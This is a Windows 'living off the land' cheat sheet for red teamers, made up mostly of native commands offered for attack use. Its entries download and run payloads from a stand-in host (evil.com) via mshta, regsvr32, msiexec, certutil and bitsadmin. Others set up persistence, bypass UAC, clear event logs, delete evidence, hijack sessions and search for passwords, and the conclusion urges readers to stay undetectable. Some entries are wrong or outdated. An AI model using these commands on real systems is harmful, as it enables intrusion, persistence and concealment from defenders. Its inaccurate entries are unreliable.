Introduction
Living off the land (LotL) in Windows leverages built-in tools to execute attacks, persist, and evade detection. This cheat sheet compiles 100 native commands for red teamers and pentesters.
Table of Contents
Why LotL Matters
LotL avoids external binaries, dodging antivirus and blending into normal system activity.
LotL Techniques
Execution
Command Usage powershell -c <command>Execute PowerShell commands cmd /c <command>Run basic shell commands mshta http://evil.com/mal.htaExecute HTA files rundll32.exe evil.dll,EntryPointLoad malicious DLLs msiexec /q /i http://evil.com/payload.msiInstall payloads silently wmic process call create "cmd.exe /c evil.exe"Spawn processes via WMI forfiles /p c:\ /c "cmd /c evil.exe"Loop execution pcalua -a evil.exeEscalate via program compatibility regsvr32 /s /u /i:http://evil.com/script.sct scrobj.dllRun scripts via DLL cmstp /ni /s evil.infExecute INF files wscript script.vbsRun VBScripts cscript script.vbsRun scripts silently start cmd /c evil.exeLaunch in new window runas /user:hacker cmd.exeUse alternate credentials wusa evil.msu /quietInstall updates with payloads
Persistence
Command Usage schtasks /create /tn "Task" /tr "cmd.exe" /sc dailySchedule daily tasks reg add HKCU\Software\Run /v Evil /t REG_SZ /d "cmd.exe"Add to startup sc create EvilService binpath= "cmd.exe /c evil.exe"Create persistent service at 12:00 cmd.exe /c evil.exeLegacy task scheduling mofcomp evil.mofPersist via WMI assoc .txt=evil.exeHijack file associations ftype txtfile=evil.exe "%1"Link file types to payloads bcdedit /set {default} safeboot networkAlter boot config
Privilege Escalation / UAC Bypass
Command Usage eventvwrBypass UAC via registry fodhelperElevate silently sdclt /kickoffelevTrigger elevated process
File Download / Transfer
Command Usage bitsadmin /transfer job /download /priority normal http://evil.com/file.exe C:\file.exeDownload files certutil -urlfetch -f http://evil.com/file.exe file.exeFetch files IWR -Uri http://evil.com/file -OutFile file.exePowerShell download certutil -decode encoded.txt decoded.exeDecode base64 files
Reconnaissance
Command Usage wmic process listList processes net user /add hacker passwordCreate users netstat -anoShow network connections ipconfig /allDisplay network config whoami /allCheck user privileges systeminfoGet system details tasklist /vList processes with details dir /s /b c:\ > files.txtEnumerate files findstr /si password *.txtSearch for creds type secret.txtRead file contents arp -aLocal network info route printView routing table nbtstat -A 192.168.1.1NetBIOS recon driverqueryList drivers fsutil fsinfo drivesList drives gpresult /rShow group policy netdom query dcDomain controller info nltest /dsgetdc:domainDomain trust details dsquery * -limit 0Query AD objects query userList user sessions
Network Operations
Command Usage netsh interface portproxy add v4tov4 listenport=80 connectport=8080 connectaddress=127.0.0.1Port forwarding ping -n 10 192.168.1.1Test connectivity tracert 8.8.8.8Trace network path pathping 8.8.8.8Analyze latency mstsc /v:192.168.1.1Remote desktop
File System Operations
Command Usage copy evil.exe c:\windows\tempCopy files move evil.exe c:\windows\system32Move files del evidence.txtDelete files echo PAYLOAD > evil.batCreate files attrib +h evil.exeHide files icacls file.exe /grant hacker:fModify permissions takeown /f file.exeTake ownership net share evil=c:\evil /grant:hacker,fullShare files mkdir c:\hiddenCreate directories rmdir /s /q c:\evidenceRemove directories ren evil.exe legit.exeRename files xcopy evil.exe c:\windows /h /cCopy with attributes robocopy c:\source c:\dest evil.exe /mirMirror directories replace evil.exe c:\windows /uReplace files expand evil.cab -F:* c:\destExtract CAB files makecab evil.exe evil.cabCompress to CAB extrac32 evil.cabExtract files
Evasion / Defense Evasion
Command Usage powershell -enc <base64>Encode payloads wevtutil cl SystemClear logs eventcreate /t ERROR /id 100 /l APPLICATION /d "Fake"Create fake logs powercfg /hibernate offDisable hibernate logs subst z: c:\evilMap drives for obfuscation
System Control
Command Usage taskkill /im process.exe /fKill processes shutdown /r /t 0Reboot system diskpartManage disks chkdsk c: /fCheck disk sfc /scannowScan system files syskeyEnable SAM encryption vssadmin create shadow /for=c:Create shadow copies
Data Manipulation
Command Usage comp file1 file2Compare files fc file1 file2Compare file differences sort < input.txt > output.txtSort data cipher /e file.txtEncrypt files
Session Management
Command Usage qwinstaList sessions rwinsta 1Reset session tscon 1 /dest:consoleHijack session tskill processnameKill tasks logoff 1End session
Miscellaneous
Command Usage auditpol /set /category:"Logon" /success:enableSet audit policy secedit /export /cfg config.txtExport security config psr /start /output record.zip /sc 1Record screen explorer c:\evilOpen explorer controlLaunch control panel msg * "Warning"Send messages set PATH=%PATH%;C:\evilModify PATH
Pro Tips
Combine powershell -enc with cmd /c for stealth.
Use whoami /all to confirm privileges.
Test in a sandbox—some commands disrupt live systems.
Conclusion
This LotL cheat sheet arms you with 100 Windows-native techniques. Master them to stay undetectable. Follow @Squid_Sec on X for more cyber hacks.
